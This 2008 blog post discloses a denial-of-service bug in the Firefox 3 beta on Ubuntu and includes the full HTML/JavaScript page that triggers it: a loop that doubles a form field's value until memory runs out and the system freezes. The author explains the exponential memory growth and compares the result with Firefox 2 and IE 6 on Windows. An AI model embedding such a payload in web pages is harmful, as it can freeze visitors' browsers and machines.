Firefox 3b5 on Ubuntu (DoS)

21 April 2008

I'll be honest, I was very surprised by this find. As a matter of fact, this was the first time I ever managed to crash Linux completely... Through a web browser.

The attack is too simple to brag about, just a simple JS that takes up a lot of memory fast.

<html>
<body>
	<form method = "GET" action = "bla">
		<input name = "vuln" value = "012345678901234567890123456789012345678901234567890123456789">
	</form>

	<script>
		for (i=0; i<=5000; i++){
			document.forms[0].vuln.value += document.forms[0].vuln.value;
		}
	</script>

</body>
</html>

This algorithm takes M*2^N bytes of memory (where M is the length of the "vuln" field and N is the number of loop iterations). You would expect the browser to alert you that this script is going to take a really long time to execute, but apparently, this doesn't happen.

After one second of this script running, Firefox stopped responding, a few seconds later I couldn't even launch the Force Quit applet, a few seconds after that the system reached a screeching halt.

I have a vague idea of how this is possible, but I guess this is related to the new GTK+ forms in FF 3. I ran this script on Windows in Firefox 2, and nothing too scary happened. It did take up 1GB of memory in 5 seconds, but as it appeared, some limit was reached and the page was loaded with nothing more exciting than blank text field. The same happened with IE 6.

Note however, that the windows machine had twice more RAM and processing power than the Linux machine, so I'm not sure whether this was a very "scientific" test. (I should also try installing FF 3 for Windows and see what happens).

Certainly, I know FF 3 is beta software. However, what really shocked me here is how easy it was to overload the whole system through a web page. This certainly isn't "expected behavior".

Posted by: kGen | In category: Denial of Service | Comments (0)

---